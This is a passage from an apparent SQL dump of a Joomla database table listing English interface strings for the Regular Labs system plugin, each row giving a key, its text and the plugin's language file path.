items','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4834,'RL_DEFAULT_SETTINGS','Default Settings','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4835,'RL_DEVICE_DESKTOP','Desktop','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4836,'RL_DEVICE_MOBILE','Mobile','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4837,'RL_DEVICE_TABLET','Tablet','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4838,'RL_DEVICES','Devices','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4839,'RL_DEVICES_DESC','Select the devices to assign to. Keep in mind that device detection is not always 100% accurate. Users can setup their device to mimic other devices','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4840,'RL_DIRECTION','Direction','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4841,'RL_DIRECTION_DESC','Select the direction','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4842,'RL_DISABLE_ON_ADMIN_COMPONENTS_DESC','Select in which administrator components NOT to enable the use of this extension.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4843,'RL_DISABLE_ON_ALL_COMPONENTS_DESC','Select in which components NOT to enable the use of this extension.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4844,'RL_DISABLE_ON_COMPONENTS','Disable on Components','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4845,'RL_DISABLE_ON_COMPONENTS_DESC','Select in which frontend components NOT to enable the use of this extension.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4846,'RL_DISPLAY_EDITOR_BUTTON','Display Editor Button','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4847,'RL_DISPLAY_EDITOR_BUTTON_DESC','Select to display an editor button.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4848,'RL_DISPLAY_LINK','Display link','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4849,'RL_DISPLAY_LINK_DESC','How do you want the link to be displayed?','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4850,'RL_DISPLAY_TOOLBAR_BUTTON','Display Toolbar Button','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4851,'RL_DISPLAY_TOOLBAR_BUTTON_DESC','Select to show a button in the toolbar.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4852,'RL_DISPLAY_TOOLTIP','Display Tooltip','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4853,'RL_DISPLAY_TOOLTIP_DESC','Select to display a tooltip with extra info when mouse hovers over link/icon.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4854,'RL_EASYBLOG','EasyBlog','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4855,'RL_ENABLE','Enable','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4856,'RL_ENABLE_IN','Enable in','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4857,'RL_ENABLE_IN_ADMIN','Enable in administrator','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4858,'RL_ENABLE_IN_ADMIN_DESC','If enabled, the plugin will also work in the administrator side of the website.<br><br>Normally you will not need this. And it can cause unwanted effects, like slowing down the administrator and the plugin tags being handled in areas you don\'t want it.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4859,'RL_ENABLE_IN_ARTICLES','Enable in articles','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4860,'RL_ENABLE_IN_COMPONENTS','Enable in components','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4861,'RL_ENABLE_IN_DESC','Select whether to enable in the frontend or administrator side or both.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4862,'RL_ENABLE_IN_FRONTEND','Enable in frontend','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4863,'RL_ENABLE_IN_FRONTEND_DESC','If enabled, it will also be available in the frontend.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4864,'RL_ENABLE_OTHER_AREAS','Enable other areas','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4865,'RL_EXCLUDE','Exclude','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4866,'RL_EXPAND','Expand','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4867,'RL_EXPORT','Export','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4868,'RL_EXPORT_FORMAT','Export Format','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4869,'RL_EXPORT_FORMAT_DESC','Select the file format for the export files.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4870,'RL_EXTRA_PARAMETERS','Extra Parameters','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4871,'RL_EXTRA_PARAMETERS_DESC','Enter any extra parameters that cannot be set with the available settings','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4872,'RL_FALL','Fall / Autumn','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4873,'RL_FIELD_NAME','Field Name','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4874,'RL_FIELD_PARAM_MULTIPLE','Multiple','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4875,'RL_FIELD_PARAM_MULTIPLE_DESC','Allow multiple values to be selected.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4876,'RL_FIELD_VALUE','Field Value','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4877,'RL_FILES_NOT_FOUND','Required %s files not found!','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4878,'RL_FILTERS','Filters','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4879,'RL_FINISH_PUBLISHING','Finish Publishing','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4880,'RL_FINISH_PUBLISHING_DESC','Enter the date to end publishing','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4881,'RL_FIX_HTML','Fix HTML','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4882,'RL_FIX_HTML_DESC','Select to let the extension fix any html structure issues it finds. This is often necessary to deal with surrounding html tags.<br><br>Only switch this off if you have issues with this.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4883,'RL_FLEXICONTENT','FLEXIcontent','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4884,'RL_FOR_MORE_GO_PRO','For more functionality you can purchase the PRO version.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4885,'RL_FORM2CONTENT','Form2Content','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4886,'RL_FRAMEWORK_NO_LONGER_USED','The Regular Labs Library does not seem to be used by any other extensions you have installed. It is probably safe to disable or uninstall this plugin.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4887,'RL_FRONTEND','Frontend','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4888,'RL_GALLERY','Gallery','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4889,'RL_GEO','Geolocating','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4890,'RL_GEO_DESC','Geolocating is not always 100% accurate. The geolocation is based on the IP address of the visitor. Not all IP addresses are fixed or known.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4891,'RL_GEO_GEOIP_COPYRIGHT_DESC','This product includes GeoLite2 data created by MaxMind, available from [[%1:link%]]','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4892,'RL_GEO_NO_GEOIP_LIBRARY','The Regular Labs GeoIP library is not installed. You need to [[%1:link start%]]install the Regular Labs GeoIP library[[%2:link end%]] to be able to use the Geolocating assignments.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4893,'RL_GO_PRO','Go Pro!','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4894,'RL_HEADING_1','Heading 1','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4895,'RL_HEADING_2','Heading 2','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4896,'RL_HEADING_3','Heading 3','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4897,'RL_HEADING_4','Heading 4','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4898,'RL_HEADING_5','Heading 5','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4899,'RL_HEADING_6','Heading 6','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4900,'RL_HEADING_ACCESS_ASC','Access ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4901,'RL_HEADING_ACCESS_DESC','Access descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4902,'RL_HEADING_CATEGORY_ASC','Category ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4903,'RL_HEADING_CATEGORY_DESC','Category descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4904,'RL_HEADING_CLIENTID_ASC','Location ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4905,'RL_HEADING_CLIENTID_DESC','Location descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4906,'RL_HEADING_COLOR_ASC','Colour ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4907,'RL_HEADING_COLOR_DESC','Colour descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4908,'RL_HEADING_DEFAULT_ASC','Default ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4909,'RL_HEADING_DEFAULT_DESC','Default descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4910,'RL_HEADING_DESCRIPTION_ASC','Description ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4911,'RL_HEADING_DESCRIPTION_DESC','Description descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4912,'RL_HEADING_ID_ASC','ID ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4913,'RL_HEADING_ID_DESC','ID descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4914,'RL_HEADING_LANGUAGE_ASC','Language ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4915,'RL_HEADING_LANGUAGE_DESC','Language descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4916,'RL_HEADING_ORDERING_ASC','Ordering ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4917,'RL_HEADING_ORDERING_DESC','Ordering descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4918,'RL_HEADING_PAGES_ASC','Menu Items ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4919,'RL_HEADING_PAGES_DESC','Menu Items descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4920,'RL_HEADING_POSITION_ASC','Position ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4921,'RL_HEADING_POSITION_DESC','Position descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4922,'RL_HEADING_STATUS_ASC','Status ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4923,'RL_HEADING_STATUS_DESC','Status descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4924,'RL_HEADING_STYLE_ASC','Style ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4925,'RL_HEADING_STYLE_DESC','Style descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4926,'RL_HEADING_TEMPLATE_ASC','Template ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4927,'RL_HEADING_TEMPLATE_DESC','Template descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4928,'RL_HEADING_TITLE_ASC','Title ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4929,'RL_HEADING_TITLE_DESC','Title descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4930,'RL_HEADING_TYPE_ASC','Type ascending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4931,'RL_HEADING_TYPE_DESC','Type descending','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4932,'RL_HEIGHT','Height','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4933,'RL_HEMISPHERE','Hemisphere','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4934,'RL_HEMISPHERE_DESC','Select the hemisphere your website is located in','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4935,'RL_HIKASHOP','HikaShop','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4936,'RL_HOME_PAGE','Home Page','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4937,'RL_HOME_PAGE_DESC','Unlike selecting the home page (default) item via the Menu Items, this will only match the real home page, not any URL that has the same Itemid as the home menu item.<br><br>This might not work for all 3rd party SEF extensions.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4938,'RL_HTML_LINK','<a href="[[%2:url%]]" target="_blank" class="[[%3:class%]]">[[%1:text%]]</a>','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4939,'RL_ICON_ONLY','Icon only','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4940,'RL_IGNORE','Ignore','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4941,'RL_IMAGE','Image','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4942,'RL_IMAGE_ALT','Image Alt','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4943,'RL_IMAGE_ALT_DESC','The Alt value of the image.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4944,'RL_IMAGE_ATTRIBUTES','Image Attributes','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4945,'RL_IMAGE_ATTRIBUTES_DESC','The extra attributes of the image, like: alt="My image" width="300"','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4946,'RL_IMPORT','Import','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4947,'RL_IMPORT_ITEMS','Import Items','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4948,'RL_INCLUDE','Include','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4949,'RL_INCLUDE_CHILD_ITEMS','Include child items','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4950,'RL_INCLUDE_CHILD_ITEMS_DESC','Also include child items of the selected items?','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4951,'RL_INCLUDE_NO_ITEMID','Include no Itemid','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4952,'RL_INCLUDE_NO_ITEMID_DESC','Also assign when no menu Itemid is set in URL?','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4953,'RL_INITIALISE_EVENT','Initialise on Event','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4954,'RL_INITIALISE_EVENT_DESC','Set the internal Joomla event on which the plugin should be initialised. Only change this if you experience issues whith the plugin not working.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4955,'RL_INSERT','Insert','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4956,'RL_INSERT_DATE_NAME','Insert Date / Name','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4957,'RL_IP_RANGES','IP Addresses / Ranges','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4958,'RL_IP_RANGES_DESC','A comma and/or enter separated list of IP addresses and IP ranges. For instance:<br>127.0.0.1<br>128.0-128.1<br>129','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4959,'RL_IPS','IP Addresses','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4960,'RL_IS_FREE_VERSION','This is the FREE version of %s.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4961,'RL_ITEM','Item','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4962,'RL_ITEM_IDS','Item IDs','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4963,'RL_ITEM_IDS_DESC','Enter the item ids to assign to. Use commas to separate the ids.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4964,'RL_ITEMS','Items','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4965,'RL_ITEMS_DESC','Select the items to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4966,'RL_JCONTENT','Joomla! Content','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4967,'RL_JED_REVIEW','Like this extension? [[%1:start link%]]Leave a review at the JED[[%2:end link%]]','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4968,'RL_JOOMLA2_VERSION_ON_JOOMLA3','You are running a Joomla 2.5 version of %1$s on Joomla 3. Please reinstall %1$s to fix the problem.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4969,'RL_JQUERY_DISABLED','You have disabled the jQuery script. %s needs jQuery to function. Make sure your template or other extensions load the necessary scripts to replace the required functionality.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4970,'RL_K2','K2','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4971,'RL_K2_CATEGORIES','K2 Categories','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4972,'RL_LANGUAGES','Languages','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4973,'RL_LANGUAGES_DESC','Select the languages to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4974,'RL_LAYOUT','Layout','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4975,'RL_LAYOUT_DESC','Select the layout to use. You can override this layout in the component or template.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4976,'RL_LEVELS','Levels','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4977,'RL_LEVELS_DESC','Select the levels to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4978,'RL_LIB','Library','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4979,'RL_LINK_TEXT','Link Text','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4980,'RL_LINK_TEXT_DESC','The text to display as link.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4981,'RL_LIST','List','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4982,'RL_LOAD_BOOTSTRAP_FRAMEWORK','Load Bootstrap Framework','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4983,'RL_LOAD_BOOTSTRAP_FRAMEWORK_DESC','Disable to not initiate the Bootstrap Framework.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4984,'RL_LOAD_JQUERY','Load jQuery Script','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4985,'RL_LOAD_JQUERY_DESC','Select to load the core jQuery script. You can disable this if you experience conflicts if your template or other extensions load their own version of jQuery.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4986,'RL_LOAD_MOOTOOLS','Load Core MooTools','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4987,'RL_LOAD_MOOTOOLS_DESC','Select to load the core MooTools script. You can disable this if you experience conflicts if your template or other extensions load their own version of MooTools.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4988,'RL_LOAD_STYLESHEET','Load Stylesheet','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4989,'RL_LOAD_STYLESHEET_DESC','Select to load the extensions stylesheet. You can disable this if you place all your own styles in some other stylesheet, like the templates stylesheet.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4990,'RL_LTR','Left-to-Right','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4991,'RL_MATCH_ALL','Match All','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4992,'RL_MATCH_ALL_DESC','Select to only let the assignment pass if all of the selected items are matched.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4993,'RL_MATCHING_METHOD','Matching Method','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4994,'RL_MATCHING_METHOD_DESC','Should all or any assignments be matched?<br><br><strong>[[%1:all%]]</strong><br>[[%2:all description%]]<br><br><strong>[[%3:any%]]</strong><br>[[%4:any description%]]','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4995,'RL_MAX_LIST_COUNT','Maximum List Count','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4996,'RL_MAX_LIST_COUNT_DESC','The maximum number of elements to show in the multi-select lists. If the total number of items is higher, the selection field will be displayed as a text field.<br><br>You can set this number lower if you experience long pageloads due to high number of items in lists.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4997,'RL_MAXIMIZE','Maximize','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4998,'RL_MEDIA_VERSIONING','Use Media Versioning','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4999,'RL_MEDIA_VERSIONING_DESC','Select to add the extension version number to the end of media (js/css) urls, to make browsers force load the correct file.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5000,'RL_MENU_ITEMS','Menu Items','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5001,'RL_MENU_ITEMS_DESC','Select the menu items to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5002,'RL_META_KEYWORDS','Meta Keywords','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5003,'RL_META_KEYWORDS_DESC','Enter the keywords found in the meta keywords to assign to. Use commas to separate the keywords.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5004,'RL_MIJOSHOP','MijoShop','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5005,'RL_MINIMIZE','Minimize','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5006,'RL_MOBILE_BROWSERS','Mobile 